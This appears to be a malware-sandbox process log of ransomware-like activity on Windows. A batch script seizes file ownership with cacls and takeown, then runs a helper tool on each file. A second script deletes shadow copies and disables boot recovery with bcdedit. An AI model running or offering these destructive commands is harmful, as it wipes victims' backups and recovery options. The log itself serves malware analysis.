C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\SmsRouter\MessageStore\edbres00002.jrs" /E /G Admin:F /C3⤵PID:4544
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\SmsRouter\MessageStore\edbres00002.jrs"3⤵
- Modifies file permissions
PID:6100
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvidfhME.exe -accepteula "edbres00002.jrs" -nobanner3⤵PID:5256
-
C:\Users\Admin\AppData\Local\Temp\QvidfhME.exeQvidfhME.exe -accepteula "edbres00002.jrs" -nobanner4⤵PID:6128
-
-
-
C:\Users\Admin\AppData\Local\Temp\QvidfhME.exeQvidfhME.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:252
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\YVPCrYSF.bat" "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\TempState\TileCache_100_0_Data.bin""2⤵PID:5392
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\TempState\TileCache_100_0_Data.bin" /E /G Admin:F /C3⤵PID:5448
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\TempState\TileCache_100_0_Data.bin"3⤵
- Modifies file permissions
PID:5340
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvidfhME.exe -accepteula "TileCache_100_0_Data.bin" -nobanner3⤵PID:5184
-
C:\Users\Admin\AppData\Local\Temp\QvidfhME.exeQvidfhME.exe -accepteula "TileCache_100_0_Data.bin" -nobanner4⤵PID:5188
-
-
-
C:\Users\Admin\AppData\Local\Temp\QvidfhME.exeQvidfhME.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5440
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\YVPCrYSF.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png""2⤵PID:5588
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png" /E /G Admin:F /C3⤵PID:5672
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png"3⤵
- Modifies file permissions
PID:5540
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvidfhME.exe -accepteula "background.png" -nobanner3⤵PID:5520
-
C:\Users\Admin\AppData\Local\Temp\QvidfhME.exeQvidfhME.exe -accepteula "background.png" -nobanner4⤵PID:5752
-
-
-
C:\Users\Admin\AppData\Local\Temp\QvidfhME.exeQvidfhME.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5832
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\YVPCrYSF.bat" "C:\Users\All Users\Microsoft\Diagnosis\DownloadedSettings\telemetry.ASM-WindowsDefault.json""2⤵PID:5852
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Diagnosis\DownloadedSettings\telemetry.ASM-WindowsDefault.json" /E /G Admin:F /C3⤵PID:5728
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Diagnosis\DownloadedSettings\telemetry.ASM-WindowsDefault.json"3⤵
- Modifies file permissions
PID:5720
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvidfhME.exe -accepteula "telemetry.ASM-WindowsDefault.json" -nobanner3⤵PID:5976
-
C:\Users\Admin\AppData\Local\Temp\QvidfhME.exeQvidfhME.exe -accepteula "telemetry.ASM-WindowsDefault.json" -nobanner4⤵PID:6068
-
-
-
C:\Users\Admin\AppData\Local\Temp\QvidfhME.exeQvidfhME.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5948
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\YVPCrYSF.bat" "C:\Users\All Users\Microsoft\Diagnosis\osver.txt""2⤵PID:5932
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Diagnosis\osver.txt" /E /G Admin:F /C3⤵PID:6084
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Diagnosis\osver.txt"3⤵
- Modifies file permissions
PID:6112
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvidfhME.exe -accepteula "osver.txt" -nobanner3⤵PID:6088
-
C:\Users\Admin\AppData\Local\Temp\QvidfhME.exeQvidfhME.exe -accepteula "osver.txt" -nobanner4⤵PID:4164
-
-
-
C:\Users\Admin\AppData\Local\Temp\QvidfhME.exeQvidfhME.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5304
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\YVPCrYSF.bat" "C:\Users\All Users\Microsoft\SmsRouter\MessageStore\edb.chk""2⤵PID:5776
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\SmsRouter\MessageStore\edb.chk" /E /G Admin:F /C3⤵PID:5324
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\SmsRouter\MessageStore\edb.chk"3⤵
- Modifies file permissions
PID:5532
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvidfhME.exe -accepteula "edb.chk" -nobanner3⤵PID:5176
-
C:\Users\Admin\AppData\Local\Temp\QvidfhME.exeQvidfhME.exe -accepteula "edb.chk" -nobanner4⤵PID:5568
-
-
-
C:\Users\Admin\AppData\Local\Temp\QvidfhME.exeQvidfhME.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5192
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\YVPCrYSF.bat" "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate2013A.xsd""2⤵PID:5692
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate2013A.xsd" /E /G Admin:F /C3⤵PID:5788
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate2013A.xsd"3⤵
- Modifies file permissions
PID:5872
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvidfhME.exe -accepteula "SettingsLocationTemplate2013A.xsd" -nobanner3⤵PID:5716
-
C:\Users\Admin\AppData\Local\Temp\QvidfhME.exeQvidfhME.exe -accepteula "SettingsLocationTemplate2013A.xsd" -nobanner4⤵PID:5472
-
-
-
C:\Users\Admin\AppData\Local\Temp\QvidfhME.exeQvidfhME.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5904
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\YVPCrYSF.bat" "C:\Users\All Users\Microsoft\Diagnosis\parse.dat""2⤵PID:6032
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Diagnosis\parse.dat" /E /G Admin:F /C3⤵PID:5784
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Diagnosis\parse.dat"3⤵
- Modifies file permissions
PID:5612
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvidfhME.exe -accepteula "parse.dat" -nobanner3⤵PID:5656
-
C:\Users\Admin\AppData\Local\Temp\QvidfhME.exeQvidfhME.exe -accepteula "parse.dat" -nobanner4⤵PID:6080
-
-
-
C:\Users\Admin\AppData\Local\Temp\QvidfhME.exeQvidfhME.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:248
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\YVPCrYSF.bat" "C:\Users\All Users\Microsoft\SmsRouter\MessageStore\edbres00001.jrs""2⤵PID:5312
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\SmsRouter\MessageStore\edbres00001.jrs" /E /G Admin:F /C3⤵PID:5812
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\SmsRouter\MessageStore\edbres00001.jrs"3⤵
- Modifies file permissions
PID:6004
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvidfhME.exe -accepteula "edbres00001.jrs" -nobanner3⤵PID:5356
-
C:\Users\Admin\AppData\Local\Temp\QvidfhME.exeQvidfhME.exe -accepteula "edbres00001.jrs" -nobanner4⤵PID:5308
-
-
-
C:\Users\Admin\AppData\Local\Temp\QvidfhME.exeQvidfhME.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5396
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\YVPCrYSF.bat" "C:\Users\Admin\AppData\Local\TileDataLayer\Database\vedatamodel.jfm""2⤵PID:5488
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\TileDataLayer\Database\vedatamodel.jfm" /E /G Admin:F /C3⤵PID:5580
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\TileDataLayer\Database\vedatamodel.jfm"3⤵PID:5768
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvidfhME.exe -accepteula "vedatamodel.jfm" -nobanner3⤵PID:5492
-
C:\Users\Admin\AppData\Local\Temp\QvidfhME.exeQvidfhME.exe -accepteula "vedatamodel.jfm" -nobanner4⤵PID:5848
-
-
-
C:\Users\Admin\AppData\Local\Temp\QvidfhME.exeQvidfhME.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5616
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\YVPCrYSF.bat" "C:\Users\All Users\Microsoft\AppV\Setup\OfficeIntegrator.ps1""2⤵PID:5564
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\AppV\Setup\OfficeIntegrator.ps1" /E /G Admin:F /C3⤵PID:5896
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\AppV\Setup\OfficeIntegrator.ps1"3⤵
- Modifies file permissions
PID:4116
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvidfhME.exe -accepteula "OfficeIntegrator.ps1" -nobanner3⤵PID:5800
-
C:\Users\Admin\AppData\Local\Temp\QvidfhME.exeQvidfhME.exe -accepteula "OfficeIntegrator.ps1" -nobanner4⤵PID:5376
-
-
-
C:\Users\Admin\AppData\Local\Temp\QvidfhME.exeQvidfhME.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6024
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\YVPCrYSF.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png""2⤵PID:5936
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png" /E /G Admin:F /C3⤵PID:5344
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png"3⤵
- Modifies file permissions
PID:5284
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvidfhME.exe -accepteula "watermark.png" -nobanner3⤵PID:5224
-
C:\Users\Admin\AppData\Local\Temp\QvidfhME.exeQvidfhME.exe -accepteula "watermark.png" -nobanner4⤵PID:5648
-
-
-
C:\Users\Admin\AppData\Local\Temp\QvidfhME.exeQvidfhME.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5236
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\YVPCrYSF.bat" "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate.xsd""2⤵PID:5868
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate.xsd" /E /G Admin:F /C3⤵PID:5600
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate.xsd"3⤵
- Modifies file permissions
PID:4264
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvidfhME.exe -accepteula "SettingsLocationTemplate.xsd" -nobanner3⤵PID:5260
-
C:\Users\Admin\AppData\Local\Temp\QvidfhME.exeQvidfhME.exe -accepteula "SettingsLocationTemplate.xsd" -nobanner4⤵PID:5484
-
-
-
C:\Users\Admin\AppData\Local\Temp\QvidfhME.exeQvidfhME.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5228
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\YVPCrYSF.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png""2⤵PID:5968
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png" /E /G Admin:F /C3⤵PID:5960
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png"3⤵
- Modifies file permissions
PID:5604
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvidfhME.exe -accepteula "superbar.png" -nobanner3⤵PID:5248
-
C:\Users\Admin\AppData\Local\Temp\QvidfhME.exeQvidfhME.exe -accepteula "superbar.png" -nobanner4⤵PID:5436
-
-
-
C:\Users\Admin\AppData\Local\Temp\QvidfhME.exeQvidfhME.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5136
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\YVPCrYSF.bat" "C:\Users\All Users\Microsoft\Diagnosis\DownloadedSettings\utc.cert.json""2⤵PID:5576
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Diagnosis\DownloadedSettings\utc.cert.json" /E /G Admin:F /C3⤵PID:5796
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Diagnosis\DownloadedSettings\utc.cert.json"3⤵
- Modifies file permissions
PID:4168
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvidfhME.exe -accepteula "utc.cert.json" -nobanner3⤵PID:5368
-
C:\Users\Admin\AppData\Local\Temp\QvidfhME.exeQvidfhME.exe -accepteula "utc.cert.json" -nobanner4⤵PID:5592
-
-
-
C:\Users\Admin\AppData\Local\Temp\QvidfhME.exeQvidfhME.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5280
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\YVPCrYSF.bat" "C:\Users\All Users\Microsoft\Storage Health\StorageHealthModel.dat""2⤵PID:5732
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Storage Health\StorageHealthModel.dat" /E /G Admin:F /C3⤵PID:6020
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Storage Health\StorageHealthModel.dat"3⤵
- Modifies file permissions
PID:5456
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvidfhME.exe -accepteula "StorageHealthModel.dat" -nobanner3⤵PID:5432
-
C:\Users\Admin\AppData\Local\Temp\QvidfhME.exeQvidfhME.exe -accepteula "StorageHealthModel.dat" -nobanner4⤵PID:5196
-
-
-
C:\Users\Admin\AppData\Local\Temp\QvidfhME.exeQvidfhME.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5916
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -s WinHttpAutoProxySvc1⤵
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1772
-
C:\Windows\SYSTEM32\cmd.exeC:\Windows\SYSTEM32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\xog1T24j.bat"1⤵PID:4544
-
C:\Windows\system32\vssadmin.exevssadmin Delete Shadows /All /Quiet2⤵
- Interacts with shadow copies
PID:4680
-
-
C:\Windows\System32\Wbem\WMIC.exewmic SHADOWCOPY DELETE2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4960
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No2⤵
- Modifies boot configuration data using bcdedit
PID:4348
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy ignoreallfailures2⤵
- Modifies boot configuration data using bcdedit
PID:4180
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Delete /TN DSHCA /F2⤵PID:252
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4988